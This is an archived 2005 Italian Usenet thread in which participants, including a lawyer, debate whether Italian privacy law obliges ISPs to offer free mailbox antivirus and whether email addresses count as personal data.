tutt'altro che campata in aria. Il provider, piaccia o no, effettua un
trattamento di dati altrui, dunque... E se e' obbligato non puo' certo
girare il costo al cliente (almeno in modo palese, come condizione del
contratto).
Un saluto.
--
Daniele Minotti
***@minotti.net
ab
2005-05-21 07:53:34 UTC
Permalink
Post by avv. Daniele NK-X-TODEL918a
Il provider, piaccia o no, effettua un
trattamento di dati altrui, dunque...
Vero. Ma non necessariamente dati personali. E poi (ne approfitto visto che
c'è un avv. come prefisso del tuo nome) il provider non potrebbe
configurarsi come quello che nel diritto internazionale è definito "common
carrier" (alla pari del servizio postale o di una compagnia aerea).

Perdona il termine anglosassone e (forse) il pressapochismo. Gli unici due
corsi universitari di diritto li ho fatti sul diritto anglosassone e su
quello internazionale in una Università non italiana -- ergo potrei essere
sulla strada sbagliata e potrebbe benissimo esserci un termine corretto
italiano per common carrier. Come ho premesso ne approfitto di quel
prefisso "avv" ;-)
--
AB
avv. Daniele NK-X-TODEL918a
2005-05-21 11:50:40 UTC
Permalink
Post by ab
Post by avv. Daniele NK-X-TODEL918a
Il provider, piaccia o no, effettua un
trattamento di dati altrui, dunque...
Vero. Ma non necessariamente dati personali.
** Un'email contiene almeno un dato personale: l'indirizzo di posta
elettronica. Per non parlare di tutto cio' che c'e' negli header...


E poi (ne approfitto
Post by ab
visto che c'è un avv. come prefisso del tuo nome) il provider non
potrebbe configurarsi come quello che nel diritto internazionale è
definito "common carrier" (alla pari del servizio postale o di una
compagnia aerea).
** Si', ha una posizione analoga (cfr. lgs. 70/2003). Cio', pero', non lo
esonera da responsabilita' in quanto svolge un trattamento.
Un saluto.
--
Daniele Minotti
***@minotti.net
ab
2005-05-21 14:22:19 UTC
Permalink
avv. Daniele NK-X-TODEL918a
2005-05-22 20:44:12 UTC
Permalink
Post by avv. Daniele NK-X-TODEL918a
** Un'email contiene almeno un dato personale: l'indirizzo di posta
elettronica. Per non parlare di tutto cio' che c'e' negli header...
...pero' allora tutta la corrispondenza (anche le cartoline, etc.)
sono dati personali che ricadono nel d.lgs.196/2003.... non ne
usciamo piu' ;-)
** eh... mica l'ho scritto il l'art. 4 TU...


E poi un indirizzo di email non mi "identifica"
** Sicuro che anche questo esempio non rientri nella nozione di dato
personale?
*qualunque informazione relativa a persona fisica, persona giuridica, ente
od associazione, identificati o identificabili, anche indirettamente,
mediante riferimento a qualsiasi altra informazione, ivi compreso un numero
di identificazione personale*
Se e' dato personale anche il *numero di matricola*...
Comunque hai fondamentalmente ragione, nel 90% dei casi qualcosa di
"personale" di dritto o di rovescio c'e'...
** Temo nel 100% :-/
Post by avv. Daniele NK-X-TODEL918a
il provider non
Post by ab
potrebbe configurarsi come quello che nel diritto internazionale
definito "common carrier" (alla pari del servizio postale o di una
compagnia aerea).
** Si', ha una posizione analoga (cfr. lgs. 70/2003). Cio', pero',
non lo esonera da responsabilita' in quanto svolge un trattamento.
Qui non ti seguo (ma potrebbe benissimo essere un mio limite), vuoi
dire che le PP.TT. svolgono un "trattamento di dati personali" quando
gestiscono la mia corrispondenza, ergo posso rivalermi su di loro se
ricevo un pacco bomba o piu' semplicemente una lettera minatoria o
comunicazioni commerciali indesiderate??? Mi parrebbe strano...
** Le poste trattano sicuramente dati personali quando smistano
corrispondenza. Rispondono nei limiti dell'art. 15 TU. Non possono, ad
esempio guardare se la comunicazione e' indesiderata, idem chi tratta posta
elettronica.
Un saluto.
--
Daniele Minotti
***@minotti.net
bio
2005-05-21 10:58:32 UTC
Permalink
Post by Brixina
Un ISP è _obbligato_ in base al D.Lgs 196/03
a fornire un servizio mailbox con *sistema antivirus gratuito* ?
All'art.4, comma 3 per definizione di misure minime di sicurezza
a) "misure minime", il complesso delle misure tecniche, informatiche,
organizzative, logistiche e procedurali di sicurezza che configurano
il livello minimo di protezione richiesto in relazione ai rischi
previsti nell'articolo 31;
Una di queste misure può/deve essere considerato un *sistema
antivirus gratuito* a livello server?
Diversamente ci sono altri riferimenti normativi a riguardo?
O ancora l'ISP può pretendere il pagamento per un servizio antivirus
o lo _deve_ fornire senza costi per l'utente?
Non sono un avvocato.

Penso che ognuno abbia obblighi di protezione dei dati ma con
modalita' diverse. Per te, le mailbox degli utenti sono delle
blackbox e non tratti certo i dati in esse contenuti (ma solo
i loro di envelope, al limite), che vengono trattati da loro,
su loro sistemi. Andando oltre (e sempre piu' al di fuori del
mio ambito di competenza) direi che e' il contrario: azioni a
carico dei contenuti delle mail dell'utente potrebbero essere
considerate violazioni della corrispondenza, e/o interruzioni
del servizio erogato, in mancanza di accordi contrattuali tra
le due parti. Il solito inutile (e potenzialmente fuorviante)
paragone e' quello del postino: tu sei il postino, mica devi
aprire le buste per vedere se dentro c'e' una polvere bianca.
Ma devi stare attento che nessuno te le rubi. Ribaltando 'sto
paragone alla variante informatica, tu ha probabilmente degli
obblighi legati alla protezione dei server di posta, e questo
a prescindere dal sistema operativo. Il contenuto delle mbox,
a mio parere, dovrebbe essere un problema dell'utente, che si
deve far carico, e anche economicamente, della protezione dei
_suoi_ sistemi, che son quelli che sono messi in pericolo dal
contenuto malevolo della mail, e che sono i sistemi che _lui_
ha l'obbligo di proteggere, non tu. Forse. Spero di non avere
usato dei termini a sproposito.

Uhmm... mi sembra di essere in linea, piu' o meno, con quello
che dice gabriele, a parte che non ritengo che una protezione
possa esserci o meno in base al sistema operativo dei server.


Fabio
Continua a leggere su narkive:
Loading...